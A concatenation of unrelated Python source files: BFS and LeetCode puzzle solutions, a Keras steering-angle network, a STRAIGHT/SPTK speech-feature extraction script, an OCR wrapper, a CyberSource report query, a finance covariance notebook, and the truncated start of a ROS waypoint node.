    # Process one whole "day" (the current BFS frontier) per outer iteration.
    for _ in range(len(queue)):
        z, x, y = queue.popleft()
        for dz, dx, dy in DELTAS:
            nz, nx, ny = z + dz, x + dx, y + dy
            if 0 <= nz < H and 0 <= nx < M and 0 <= ny < N and box[nz][nx][ny] == 0:
                box[nz][nx][ny] = 1
                queue.append((nz, nx, ny))
    result_day += 1

# Any remaining unripe cell is unreachable -> impossible.
if any(cell == 0 for layer in box for row in layer for cell in row):
    print(-1)
else:
    # The last frontier ripened nothing new, so subtract that extra day.
    print(result_day - 1)
|
import os
import cv2
import csv
import numpy as np
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from keras.models import Sequential, Model
from keras.layers import Lambda, Cropping2D, BatchNormalization, ELU
from keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape
from keras.layers.convolutional import Convolution2D
from keras.regularizers import l2
from functions import uniform_data, gen
# Parse CSV: each row of driving_log.csv is one sample (image paths + telemetry).
samples = []
with open('./driving_log.csv') as csvfile:
    reader = csv.reader(csvfile)
    for line in reader:
        samples.append(line)
# Split samples into training/test set
train_samples, valid_samples = train_test_split(samples, test_size=0.1)
# Make data more uniform(bins data and cuts all bins to average bin length)
# Dont use anymore. Data is made uniform in generator
'''
print("Length before uniform:" + str(len(train_samples)))
train_samples = uniform_data(train_samples,bin_num=15)
print("Length after uniform:" + str(len(train_samples)))
'''
##### MODEL ####
# NVIDIA-style behavioural-cloning network, written against the Keras 1.x
# API (Convolution2D with subsample=strides, border_mode=padding).
model = Sequential()
# Preprocess incoming data, centered around zero with small standard deviation and crop
# NOTE(review): input_shape (90,320,3) implies frames are cropped before
# reaching the network (no Cropping2D layer is added here) — confirm that
# functions.gen performs the crop.
model.add(Lambda(lambda x: x/127.5 - 1., input_shape=(90,320,3)))
# Convolution layers with ELU activation and batch normalization
model.add(Convolution2D(24, 5,5, activation='elu', subsample=(2, 2), border_mode='valid'))
model.add(BatchNormalization())
model.add(Convolution2D(36, 5,5, activation='elu', subsample=(2, 2), border_mode='valid'))
model.add(BatchNormalization())
model.add(Convolution2D(48, 5,5, activation='elu', subsample=(2, 2), border_mode='valid'))
model.add(BatchNormalization())
model.add(Convolution2D(64, 3,3, activation='elu', border_mode='valid'))
model.add(BatchNormalization())
# Fully Connected layers with ELU activation and dropout layers
model.add(Flatten())
model.add(Dropout(0.50))
model.add(Dense(100, activation='elu'))
model.add(Dropout(0.50))
model.add(Dense(50, activation='elu'))
model.add(Dropout(0.50))
model.add(Dense(10, activation='elu'))
model.add(Dropout(0.50))
# Single regression output: the steering angle.
model.add(Dense(1))
model.compile(loss='mse', optimizer='adam')
#### TRAIN ####
# Training parameters
batch_size = 128
augmentation_factor = 4 #cameras(3) * flip(2) * 70% drop rate
epochs = 5
# Create generators
train_generator = gen(train_samples, batch_size=batch_size)
validation_generator = gen(valid_samples, batch_size=batch_size)
# fit model
# Sizes are scaled by augmentation_factor because gen() expands each csv row.
training_size = len(train_samples) * augmentation_factor
valid_size = len(valid_samples) * augmentation_factor
model.fit_generator(train_generator, samples_per_epoch= training_size,\
        validation_data=validation_generator, \
        nb_val_samples=valid_size, nb_epoch=epochs)
model.save('model.h5')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SYNOPSIS
extract_straight [-h,--help] [-v,--verbose] [--version]
DESCRIPTION
TODO This describes how to use this script. This docstring
will be printed by the script if there is an error or
if the user requests help (-h or --help).
EXAMPLES
TODO: Show some examples of how to use this script.
EXIT STATUS
TODO: List exit codes
AUTHOR
Sébastien Le Maguer <Sebastien.Le_maguer@irisa.fr>
LICENSE
This script is in the public domain, free from copyrights or restrictions.
VERSION
$Id$
"""
import glob # For listing all *.XXX files
import ConfigParser # For configuration file management
import bitstring
from bitstring import ConstBitStream
import numpy
import subprocess
from subprocess import call, Popen # For running external commands
import math
import string
import sys, os, traceback, optparse
import time
import re
import logging
#from pexpect import run, spawn
FNULL = open(os.devnull, 'w') # dev/null handler constant
################################################################################
### Extraction functions
################################################################################
def extractStraight(wav_dir, sp_dir, f0_dir, ap_dir):
    """
    Extract STRAIGHT coefficients to their respective directories

    Builds one MATLAB batch script that, for each *.wav in wav_dir, writes
    the spectrum (*.sp), fundamental frequency (*.f0) and aperiodicity
    (*.ap) as raw little-endian float files, then runs MATLAB on it.

    wav_dir -- directory containing the input *.wav files
    sp_dir  -- output directory for spectrum files
    f0_dir  -- output directory for F0 files
    ap_dir  -- output directory for aperiodicity files
    """
    global configuration, logger
    logger.info("START STRAIGHT EXTRACTION")
    # Frame shift in ms = frameshift-in-samples / sampling-frequency * 1000.
    frameshift_ms = float(configuration.get("extract", "frameshift")) / float(configuration.get("extract", "sampfreq")) * 1000
    # Generate script header
    script_content = """
addpath('%s');
prm.F0frameUpdateInterval = %f;
prm.F0searchUpperBound = %s;
prm.F0searchLowerBound = %s;
prm.spectralUpdateInterval = %f;
""" % (configuration.get("tools", "straight"),
       frameshift_ms,
       configuration.get("f0", "upperf0"),
       configuration.get("f0", "lowerf0"),
       frameshift_ms)
    # Generate script content: one analysis + three fwrite blocks per wav.
    for wav_fn in glob.iglob(wav_dir + "/*.wav"):
        base = os.path.basename(wav_fn)[:-4]
        sp_fn = sp_dir + "/" + base + ".sp"
        ap_fn = ap_dir + "/" + base + ".ap"
        f0_fn = f0_dir + "/" + base + ".f0"
        script_content += """
fprintf(1,'Processing %s\\n');
[x, fs] = wavread('%s');
[f0, ap] = exstraightsource(x, fs, prm);
[sp] = exstraightspec(x, f0, fs, prm);
ap = ap';
sp = sp';
f = fopen('%s', 'wb'); fwrite(f, sp, 'float'); fclose(f);
f = fopen('%s', 'wb'); fwrite(f, f0, 'float'); fclose(f);
f = fopen('%s', 'wb'); fwrite(f, ap, 'float'); fclose(f);
""" % (wav_fn, wav_fn, sp_fn, f0_fn, ap_fn);
    # Save script
    if not os.path.isdir(configuration.get("directories", "script_dir")):
        os.mkdir(configuration.get("directories", "script_dir"))
    f_script = open(configuration.get("directories", "script_dir") + "/extract_straight.m", "w")
    f_script.write(script_content)
    f_script.close()
    # Execute matlab
    # NOTE(review): f0_dir and ap_dir are only created when sp_dir is
    # missing; if sp_dir exists but the others do not, MATLAB's fopen will
    # fail — confirm this is the intended precondition.
    if not os.path.isdir(sp_dir):
        os.mkdir(sp_dir)
        os.mkdir(f0_dir)
        os.mkdir(ap_dir)
    f_script = open(configuration.get("directories", "script_dir") + "/extract_straight.m")
    try:
        call(["matlab", "-nodisplay", "-nosplash", "-nojvm"], stdin=f_script, stdout=FNULL)
    finally:
        f_script.close()
    logger.info("END STRAIGHT EXTRACTION")
def sp2mgc(sp_dir, mgc_dir):
    """
    Generate MGC coefficients from the spectrum extracted by STRAIGHT

    Pipes every *.sp file through the SPTK ``mgcep`` tool and writes the
    result to a *.mgc file of the same base name in mgc_dir.
    """
    global configuration, logger
    logger.info("START SP2MGC CONVERSION")
    # Create directory
    if not os.path.isdir(mgc_dir):
        os.mkdir(mgc_dir)
    sampfreq_khz = int(configuration.get("extract", "sampfreq")) * 0.001
    for sp_fn in glob.iglob(sp_dir + "/*.sp"):
        base = os.path.basename(sp_fn)[:-4]
        mgc_fn = mgc_dir + "/" + base + ".mgc"
        logger.debug("convert %s ...." % sp_fn)
        cmd_mgcep = ["mgcep",
                     "-a " + configuration.get("mgc", "freqwarp"),
                     "-m " + configuration.get("mgc", "order"),
                     "-l 2048 -e 1.0E-08 -j 0 -f 0.0 -q 3" # FIXME: constants
                     ]
        if int(configuration.get("mgc", "gamma")) != 0:
            cmd_mgcep += ["-o 4 "] # FIXME: constants
        # NOTE(review): cmd_lpc2lsp is assembled but never executed — only
        # mgcep runs below.  Confirm whether an lpc2lsp pipeline stage was
        # intended (cf. the commented-out redirection just after it).
        cmd_lpc2lsp = ["lpc2lsp",
                       "-n 2048 -p 8 -d 1.0E-08", # FIXME: constants
                       "-m " + configuration.get("mgc", "order"),
                       "-s " + str(sampfreq_khz)
                       ]
        if int(configuration.get("mgc", "lngain")) == 1:
            cmd_lpc2lsp += ["-l"]
        #cmd += ["> " + mgc_fn]
        f_sp = open(sp_fn)
        f_mgc = open(mgc_fn, "w")
        try:
            # string.join flattens the argument list into one shell command.
            call(string.join(cmd_mgcep), shell=True, stdin=f_sp, stdout=f_mgc)
        except Exception:
            logger.error(traceback.format_exc())
        finally:
            f_sp.close()
            f_mgc.close()
    logger.info("END SP2MGC CONVERSION")
def f02lf0(f0_dir, lf0_dir):
    """
    Convert F0 to the log scale

    Reads each *.f0 file as a stream of little-endian 32-bit floats and
    writes log(F0) to a *.lf0 file; frames with F0 == 0 (unvoiced) are
    written as the sentinel -1e+10 ("log zero").
    """
    global configuration, logger
    logger.info("START F02LF0 CONVERSION")
    # Create directory
    if not os.path.isdir(lf0_dir):
        os.mkdir(lf0_dir)
    for f0_fn in glob.iglob(f0_dir + "/*.f0"):
        base = os.path.basename(f0_fn)[:-4]
        logger.debug("convert %s ...." % f0_fn)
        lf0_fn = lf0_dir + "/" + base + ".lf0"
        f_in = open(f0_fn, "rb")
        raw_data = ConstBitStream(f_in)
        f_in.close()
        # readlist returns a one-element list per requested field.
        float_num = raw_data.readlist('floatle:32')
        f_out = open(lf0_fn, "wb")
        try:
            # Loop until the bitstream is exhausted, signalled by ReadError.
            while True:
                if float_num[0] == 0:
                    float_num = numpy.float32(-1e+10)
                else:
                    float_num = numpy.float32(math.log(float_num[0]))
                f_out.write(float_num)
                float_num = raw_data.readlist('floatle:32')
        except bitstring.ReadError:
            pass
        finally:
            f_out.close()
    logger.info("END F02LF0 CONVERSION")
def ap2bap(ap_dir, bap_dir):
    """
    Generate band values from the aperiodicity extracted by STRAIGHT

    Runs the SPTK ``mgcep`` tool on every *.ap file in ap_dir and writes
    the result to a *.bap file of the same base name in bap_dir.
    """
    global configuration, logger
    logger.info("START AP2BAP CONVERSION")
    # Create directory
    if not os.path.isdir(bap_dir):
        os.mkdir(bap_dir)
    for ap_fn in glob.iglob(ap_dir + "/*.ap"):
        base = os.path.basename(ap_fn)[:-4]
        bap_fn = bap_dir + "/" + base + ".bap"
        logger.debug("convert %s ...." % bap_fn)
        f_ap = open(ap_fn)
        f_bap = open(bap_fn, "w")
        try:
            cmd = ["mgcep",
                   "-a", configuration.get("mgc", "freqwarp"),
                   "-m", configuration.get("bap", "order"),
                   # FIXME: constants
                   "-l", "2048", "-e", "1.0E-08", "-j", "0", "-f", "0.0", "-q", "1"]
            # BUGFIX: cmd is an argument *list*, so it must not be run with
            # shell=True — in that mode only "mgcep" is executed and all the
            # flags are handed to the shell itself (as $0, $1, ...) instead
            # of to mgcep.  Run it directly.
            call(cmd, stdout=f_bap, stdin=f_ap)
        except Exception:
            # FIXME: message
            logger.error(traceback.format_exc())
        finally:
            f_ap.close()
            f_bap.close()
    logger.info("END AP2BAP CONVERSION")
################################################################################
### Configuration loading and logging setup functions
################################################################################
def loadConfiguration(conf_file):
    """
    Loading the configuration file conf_file

    Parses the INI-style file and stores the parser in the module-global
    `configuration` that every extraction function reads.
    """
    global configuration
    configuration = ConfigParser.SafeConfigParser()
    configuration.read(conf_file)
def setupLogging(is_verbose):
    """
    Configure and return the script logger.

    The root logging format is installed once via basicConfig, and the
    "EXTRACT_STRAIGHT" logger is set to DEBUG when is_verbose is true,
    INFO otherwise.
    """
    logging.basicConfig(format='[%(asctime)s] %(levelname)s : %(message)s')
    level = logging.DEBUG if is_verbose else logging.INFO
    logger = logging.getLogger("EXTRACT_STRAIGHT")
    logger.setLevel(level)
    return logger
################################################################################
### Main function
################################################################################
def main():
    """Main entry function

    Runs the full STRAIGHT pipeline: coefficient extraction (sp/f0/ap)
    followed by the conversions sp->mgc, f0->lf0 and ap->bap.  Expects
    args[0] (set by the module-level option parser) to be the path of the
    configuration file.
    """
    global options, args
    # Init
    loadConfiguration(args[0])
    data_dir = configuration.get("directories", "root") + "/" + configuration.get("directories", "data_dir")
    # STRAIGHT coefficient extraction
    extractStraight(data_dir + "/" + configuration.get("directories", "wav_dir"),
                    data_dir + "/" + configuration.get("directories", "sp_dir"),
                    data_dir + "/" + configuration.get("directories", "f0_dir"),
                    data_dir + "/" + configuration.get("directories", "ap_dir"))
    # STRAIGHT coefficient conversion
    sp2mgc(data_dir + "/" + configuration.get("directories", "sp_dir"),
           data_dir + "/" + configuration.get("directories", "mgc_dir"))
    f02lf0(data_dir + "/" + configuration.get("directories", "f0_dir"),
           data_dir + "/" + configuration.get("directories", "lf0_dir"))
    ap2bap(data_dir + "/" + configuration.get("directories", "ap_dir"),
           data_dir + "/" + configuration.get("directories", "bap_dir"))
################################################################################
### Main part encapsulation
################################################################################
if __name__ == '__main__':
    try:
        # Parse command-line options (Python 2 script; optparse is legacy).
        parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(),
                                       usage=globals()['__doc__'],
                                       version='$Id$')
        parser.add_option('-v', '--verbose', action='store_true',
                          default=False, help='verbose output')
        (options, args) = parser.parse_args()
        logger = setupLogging(options.verbose)
        # Debug time
        start_time = time.time()
        if options.verbose: logger.debug(time.asctime())
        # Running main function <=> run application
        main()
        # Debug time
        if options.verbose: logger.debug(time.asctime())
        if options.verbose: logger.debug('TOTAL TIME IN MINUTES: %f' % ((time.time() - start_time) / 60.0))
        # Exit program
        sys.exit(0)
    except KeyboardInterrupt, e: # Ctrl-C
        raise e
    except SystemExit, e: # sys.exit()
        pass
    except Exception, e:
        # Last-resort handler: report the traceback and hard-exit non-zero.
        print 'ERROR, UNEXPECTED EXCEPTION'
        print str(e)
        traceback.print_exc()
        os._exit(1)
|
# Python 2 tutorial snippets: lists, tuples, sets, slicing, comprehensions.
classmates = ['Michael', 'Bob', 'Tracy']
classmates.insert(1,'Jack')  # insert before index 1
print classmates
classmates = ('Michael', 'Bob', 'Tracy')
classmates = ('Jack',)  # one-element tuple requires the trailing comma
print type(classmates)
print classmates
s = set([1, 2, 3])
s.add(4)
print s
s.remove(2)
print s
l = range(100)  # Python 2: range() returns a real list
print l
print l[1:10]
print l[:10]
print l[3:]
print l[-10:]
print l[:20:2]  # every second element of the first twenty
print 'comprehasion:\n'
a = [x*2 for x in l]
print a
|
# Chapter 02 - Unit 11 - health
"""
Example:
Input:
5
16 17 15 16 17
180 175 172 170 165
67 72 59 62 55
5
15 17 16 15 16
166 156 168 170 162
45 52 56 58 47
Output:
16.2
172.4
63.0
15.8
164.4
51.6
A
"""
class Student:
    """A single student's health record: age, height and weight."""

    def __init__(self, age, height, weight):
        # Store the raw measurements unchanged.
        self.age, self.height, self.weight = age, height, weight
class Class:
    """A named group of students with per-attribute averages.

    The three public average methods previously repeated the same loop;
    they now share one private helper (same behavior, no duplication).
    """

    def __init__(self, name):
        self.name = name
        self.students = list()

    def _average(self, attr):
        # Mean of one numeric attribute over all students.
        total = 0
        for student in self.students:
            total += getattr(student, attr)
        return float(total / len(self.students))

    def age_average(self):
        """Mean age of the class."""
        return self._average('age')

    def height_average(self):
        """Mean height of the class."""
        return self._average('height')

    def weight_average(self):
        """Mean weight of the class."""
        return self._average('weight')

    def info(self):
        # Print the three averages in the order the exercise expects.
        print(self.age_average())
        print(self.height_average())
        print(self.weight_average())
def set_class(n, c):
    """Read three whitespace-separated stdin lines (ages, heights, weights)
    and append n Student records to class c."""
    # The generator is consumed in order during unpacking, so the three
    # input() calls happen in the same ages/heights/weights sequence.
    ages, heights, weights = (input().split() for _ in range(3))
    for idx in range(n):
        c.students.append(
            Student(int(ages[idx]), int(heights[idx]), int(weights[idx])))
n = int(input())  # number of students in class A
A = Class('A')
set_class(n, A)
n = int(input())  # number of students in class B
B = Class('B')
set_class(n, B)
# Print the three averages (age, height, weight) for each class.
A.info()
B.info()
ah = A.height_average()
aw = A.weight_average()
bh = B.height_average()
bw = B.weight_average()
# Winner: taller average height wins; on a height tie, the *lighter*
# average weight wins; equal on both prints 'Same'.
if ah > bh:
    print(A.name)
elif ah == bh:
    if aw < bw:
        print(A.name)
    elif aw == bw:
        print('Same')
    else:
        print(B.name)
else:
    print(B.name)
|
import click
import cv2
import pdf2image
import pytesseract as pt
import logging
from data_utils import *
logger = logging.getLogger("test.py")
logger.setLevel(logging.DEBUG)
class ocr_reader:
    """OCR a png/jpeg/jpg image or a pdf and append the text to output_file."""

    def __init__(self, input_file, output_file, text=""):
        self.input_file = input_file
        self.output_file = output_file
        self.text = text

    def ocr_utils(self):
        """Single-image path: load, preprocess, then OCR."""
        image = cv2.imread(self.input_file)
        image = preprocess(image, self.input_file)
        text = pt.image_to_string(image)
        return text

    def pdf_to_img(self):
        """Rasterize every pdf page into a PIL image."""
        return pdf2image.convert_from_path(self.input_file)

    def pdf_pages(self):
        """OCR every page of the pdf and return the concatenated text.

        BUGFIX: the original returned inside the loop, so only the first
        page was ever OCR'd; all pages are now accumulated.
        """
        texts = []
        for img in self.pdf_to_img():
            img = preprocess(np.array(img), self.input_file)
            texts.append(pt.image_to_string(img))
        return "".join(texts)

    def write_file(self, text):
        """Postprocess `text` and append it to the output file.

        BUGFIX: the original postprocessed `text` but then wrote the stale
        self.text, silently discarding the postprocessing.
        """
        text = postprocess(text)
        with open(self.output_file, 'a') as out:
            out.write(text)
@click.command()
@click.option('--input', type=str)
@click.option('--output', type=str)
# BUGFIX: the option name '--verbose' was declared twice; give it a proper
# short alias instead.
@click.option('--verbose', '-v', count=True)
def main(input, output, verbose):
    """Dispatch on the input file extension and run the matching OCR path."""
    if input.endswith(("png", "jpeg", "jpg")):
        text = ocr_reader(input, output).ocr_utils()
        ocr_reader(input, output, text).write_file(text)
    elif input.endswith("pdf"):
        text = ocr_reader(input, output).pdf_pages()
        ocr_reader(input, output, text).write_file(text)
    else:
        logger.error("File type not supported!")
        # BUGFIX: nothing was written, so do not claim success below.
        return
    click.echo('Ocr reading finished! output is saved in specified filename')
if __name__ == '__main__':
    logger.info("Ocr reading started !")
    main()
|
from CyberSource import *
import os
from importlib.machinery import SourceFileLoader
config_file = os.path.join(os.getcwd(), "data", "Configuration.py")
# Load the merchant Configuration module directly from its file path.
configuration = SourceFileLoader("module.name", config_file).load_module()
def available_reports():
    """
    Search CyberSource for reports executed in a fixed October 2018 window
    and print the raw API status code and response body.
    """
    try:
        start_time = "2018-10-01T00:00:00.0Z"
        end_time = "2018-10-30T23:59:59.0Z"
        time_query_type = "executedTime"
        # Reading Merchant details from Configuration file
        config_obj = configuration.Configuration()
        details_dict1 = config_obj.get_configuration()
        report_obj = ReportsApi(details_dict1)
        return_data, status, body = report_obj.search_reports(start_time, end_time, time_query_type)
        print("API RESPONSE CODE : ", status)
        print("API RESPONSE BODY : ", body)
    except Exception as e:
        # Sample-code style: the broad catch only reports, it does not re-raise.
        print("Exception when calling ReportsApi->search_reports: %s\n" % e)
if __name__ == "__main__":
    available_reports()
|
#
# @lc app=leetcode id=79 lang=python3
#
# [79] Word Search
#
# https://leetcode.com/problems/word-search/description/
#
# algorithms
# Medium (32.07%)
# Total Accepted: 314K
# Total Submissions: 978.9K
# Testcase Example: '[["A","B","C","E"],["S","F","C","S"],["A","D","E","E"]]\n"ABCCED"'
#
# Given a 2D board and a word, find if the word exists in the grid.
#
# The word can be constructed from letters of sequentially adjacent cell, where
# "adjacent" cells are those horizontally or vertically neighboring. The same
# letter cell may not be used more than once.
#
# Example:
#
#
# board =
# [
# ['A','B','C','E'],
# ['S','F','C','S'],
# ['A','D','E','E']
# ]
#
# Given word = "ABCCED", return true.
# Given word = "SEE", return true.
# Given word = "ABCB", return false.
#
#
#
class Solution:
    """LeetCode 79 — Word Search (DFS with backtracking)."""

    def exist(self, board: List[List[str]], word: str) -> bool:
        """Return True if `word` can be traced through horizontally or
        vertically adjacent cells, using each cell at most once."""
        rows, cols = len(board), len(board[0])
        # One shared visited grid suffices: find() restores every cell it
        # marks before returning False, so no reallocation per start cell
        # is needed (the original rebuilt `visited` twice per candidate).
        visited = [[0] * cols for _ in range(rows)]
        for i in range(rows):
            for j in range(cols):
                if board[i][j] == word[0] and self.find(visited, board, word, 0, i, j):
                    return True
        return False

    def find(self, visited, board, word, index, row, col):
        """DFS for word[index:] starting at (row, col).

        BUGFIX: the cell now unmarks itself on failure (proper
        backtracking); the original relied on each caller resetting its
        neighbours and on exist() reallocating the grid.
        """
        if index >= len(word) or board[row][col] != word[index] or visited[row][col]:
            return False
        if index == len(word) - 1:
            return True
        visited[row][col] = 1
        for nr, nc in ((row - 1, col), (row + 1, col), (row, col - 1), (row, col + 1)):
            if 0 <= nr < len(board) and 0 <= nc < len(board[0]):
                if self.find(visited, board, word, index + 1, nr, nc):
                    return True
        visited[row][col] = 0
        return False
|
# -*- coding: utf-8 -*-
# @Time : 2019-10-20 19:29
# @Author : icarusyu
# @FileName: 2.py
# @Software: PyCharm
# def f():
# n = int(input())
# zheng = 1
# ni = 0
# while n>0:
# zheng, ni = 3*zheng + ni, zheng + 3*ni
# # print(zheng,ni)
# n-=1
# return zheng % (10**9+7)
# def f():
# n = int(input())
# # if n==1:return 3
# i = n+1
# j = 2
# res = 1
# while i >1:
# # print('last',res)
# res = 4*res - 2**(j-2)
# j+=1
# # print('tt',2**(i-2))
# # print('res',res)
# i-=1
# return res %(10**9+7)
# def mi(n):
# # 快速幂求x ^ y
# n2 = n * 2 - 1
# n1 = n - 1
# base = 2
# a = 1
# mod = 1e9+7
# res = 0
# while n1 > 0:
# cur = n1 % 2
# if cur == 1:
# a *= base
# a = int(a % mod)
# if n1 > 0:
# base = base * base
# base = int(base % mod)
# n1 = n1 >> 1
# return n1
def mi(base, n):
    """Return base**n modulo 10**9+7 via binary (fast) exponentiation.

    BUGFIX: the original accumulated the product in `a` but returned the
    untouched `res`, so it always returned 1.  Also uses an integer
    modulus — 1e9+7 is a float and would introduce rounding.
    """
    mod = 10 ** 9 + 7
    acc = 1
    while n > 0:
        if n % 2 == 1:
            acc = (acc * base) % mod
        base = (base * base) % mod
        n >>= 1
    return acc
def f():
    """Read n from stdin, print 2**n mod 1e9+7 (via mi) and return
    (a + a*a)//2 reduced modulo 1e9+7.

    NOTE(review): the final `% (1e9+7)` is a *float* modulus applied after
    integer floor-division, so the result becomes a float — confirm the
    intended formula is integer arithmetic with 10**9+7.
    """
    n = int(input())
    a = mi(2,n)
    print(a)
    res = (a + a*a)//2 % (1e9+7)
    return res
print(f()) |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import cma_gui as cma
import numpy as np
import pandas as pd
from statsmodels.stats.weightstats import DescrStatsW
# +
# Exponential weight
# 240 monthly observations, oldest first: weight_i = (1-λ)·λ^age where the
# most recent month has age 0 (λ comes from the GUI value dict).
count = [x for x in range(240)]
count.reverse()
percent = [(1-cma.val_dict['lambda_val'])*(cma.val_dict['lambda_val']**x) for x in count]
sum_val = sum(percent)
# Normalise so the weights sum to exactly 1.
exponential_weight = pd.Series([x / sum_val for x in percent])
# -
# # Define functions
# ## Standard deviation functions
# +
def monthly_standard_dev(dataframe_returns, exponential_weight):
    """Exponentially-weighted monthly standard deviation per column.

    Squares each column's deviation from its mean, weights the rows
    positionally by exponential_weight, sums, and takes the square root.
    """
    deviations_sq = (dataframe_returns - dataframe_returns.mean()) ** 2
    # Positional (index-free) weighting, matching the weight series order.
    weighted = deviations_sq.mul(np.asarray(exponential_weight), axis=0)
    return np.sqrt(weighted.sum())
def exponential_std_dev(monthly_std_dev, exponential_weight, dataframe_returns):
    """Annualise the exponentially-weighted monthly standard deviation.

    Implements sqrt(((1+m)^2 + s^2)^12 - (1+m)^24) per column, where m is
    the weighted mean monthly return (dot product with the weights) and s
    the monthly std-dev.  Returns a one-column DataFrame indexed by the
    return columns.
    """
    # Annual adjusted standard deviation
    monthly_std_dev_list = monthly_std_dev.tolist()
    # s^2 per column.
    adj_sd_list2 = [x**2 for x in monthly_std_dev_list]
    # (1 + weighted mean monthly return)^2 per column.
    sum_prod = (1 + pd.Series([dataframe_returns.iloc[:,x].values.dot(exponential_weight.values)
                               for x in range(len(dataframe_returns.columns))]))**2
    base = [sum(x) for x in zip(sum_prod, adj_sd_list2)]
    # ((1+m)^2 + s^2)^12
    equation_p1 = [x**12 for x in base]
    sum_prod2 = (1 + pd.Series([dataframe_returns.iloc[:,x].values.dot(exponential_weight.values)
                                for x in range(len(dataframe_returns.columns))]))
    base_2 = sum_prod2.tolist()
    # (1+m)^(2*12)
    equation_p2 = [x ** (2*12) for x in base_2]
    pre_final = [x-y for x,y in zip(equation_p1, equation_p2)]
    annual_adj_std_dev = pd.DataFrame(np.sqrt(pre_final))
    annual_adj_std_dev.index = dataframe_returns.columns
    return annual_adj_std_dev
# -
# ## Covariance and Correlation Matrices Functions
# +
def value_minus_mean(dataframe_returns, monthly_std_dev, exponential_weight):
    """Standardise returns: (x - column mean) / monthly std-dev, re-indexed
    to line up with the exponential weight series."""
    standardized = dataframe_returns.sub(dataframe_returns.mean()).div(monthly_std_dev)
    standardized.index = exponential_weight.index
    return standardized
def exponential_correlation(value_minus_mean, exponential_weight):
    """Exponentially-weighted correlation matrix of standardised returns.

    Entry (i, j) is sum(z_i * z_j * w) over the observation index.
    """
    cols = value_minus_mean.columns
    pairwise = [
        [(value_minus_mean.iloc[:, i] * value_minus_mean.iloc[:, j] * exponential_weight).sum()
         for j in range(len(cols))]
        for i in range(len(cols))
    ]
    return pd.DataFrame(pairwise, index=cols, columns=cols)
def stand_dev_matrix(annual_adj_std_dev):
    """Outer product of the annual std-dev vector with itself (σ_i·σ_j)."""
    sd = pd.DataFrame(annual_adj_std_dev)
    return sd.dot(sd.T)
# -
# # USD
# ## Import Data
# +
# Extract Indices
equity_us_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_us_code' in k}.values())))
fixed_us_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_us_code' in k}.values())))
alts_us_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_us_code' in k}.values())))
# Import returns
# US returns arrive in percent and are converted to decimal here (/100).
df_returns_us = pd.read_csv('P:\\Advisory\\Research\\Automation\\CMAs\\Data\\combined_returns_us.csv', index_col=0)/100
# -
# ## Standard Deviations
# +
# Monthly standard deviation
monthly_std_dev_us = monthly_standard_dev(df_returns_us, exponential_weight)
# Annual adjusted standard deviation
annual_adj_std_dev_us = exponential_std_dev(monthly_std_dev_us, exponential_weight, df_returns_us)
# -
# ## Covariance and Correlation Matrices
# +
value_minus_mean_div_sd_us = value_minus_mean(df_returns_us, monthly_std_dev_us, exponential_weight)
# Exponential correlation
exp_corr_us = exponential_correlation(value_minus_mean_div_sd_us, exponential_weight)
# Exponential covariance
matrix_sd_us = stand_dev_matrix(annual_adj_std_dev_us)
exp_cov_us = exp_corr_us.mul(matrix_sd_us, axis=0)
# Final correlation matrix
corr_matrix_final_us = (exp_cov_us.div(matrix_sd_us))
# -
# # Non-USD
# ## Import Data
# +
# Extract Indices
equity_nonus_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_nonus_code' in k}.values())))
fixed_nonus_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_nonus_code' in k}.values())))
alts_nonus_code = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_nonus_code' in k}.values())))
# Import returns
# NOTE(review): unlike the US data above, these returns are NOT divided by
# 100 — confirm whether the non-US csv is already in decimal form.
df_returns_nonus = pd.read_csv('P:\\Advisory\\Research\\Automation\\CMAs\\Data\\combined_returns_nonus.csv', index_col=0)
# -
# ## Standard Deviations
# +
# Monthly standard deviation
monthly_std_dev_nonus = monthly_standard_dev(df_returns_nonus, exponential_weight)
# Annual adjusted standard deviation
annual_adj_std_dev_nonus = exponential_std_dev(monthly_std_dev_nonus, exponential_weight, df_returns_nonus)
annual_adj_std_dev_nonus
# -
# ## Covariance and Correlation Matrices
# +
value_minus_mean_div_sd_nonus = value_minus_mean(df_returns_nonus, monthly_std_dev_nonus, exponential_weight)
# Exponential correlation
exp_corr_nonus = exponential_correlation(value_minus_mean_div_sd_nonus, exponential_weight)
# Exponential covariance
matrix_sd_nonus = stand_dev_matrix(annual_adj_std_dev_nonus)
exp_cov_nonus = exp_corr_nonus.mul(matrix_sd_nonus, axis=0)
# Final correlation matrix
corr_matrix_final_nonus = (exp_cov_nonus.div(matrix_sd_nonus))
corr_matrix_final_nonus
# -
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import PoseStamped
from styx_msgs.msg import Lane, Waypoint, TrafficLightArray, Intersection
from geometry_msgs.msg import TwistStamped
import math
import tf
import numpy as np
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO (for Yousuf and Aaron): Stopline location for each traffic light.
'''
LOOKAHEAD_WPS = 200 # Number of waypoints we will publish. You can change this number
TARGET_SPEED = 5.0  # default cruise velocity — units per simulator convention, TODO confirm m/s vs mph
SAMPLE_RATE = 100  # intended loop rate in Hz — NOTE(review): not referenced in the visible code
ENABLE_TL = 1  # 1 = react to traffic lights
MAX_DECEL = 1  # deceleration used for the braking velocity profile (v = sqrt(2*MAX_DECEL*d))
STOPPING_DISTANCE = 5  # margin to stop before a light — units TODO confirm (waypoints vs meters)
class WaypointUpdater(object):
    def __init__(self):
        """Initialise the node, wire up pub/sub, and block in rospy.spin()."""
        rospy.init_node('waypoint_updater')
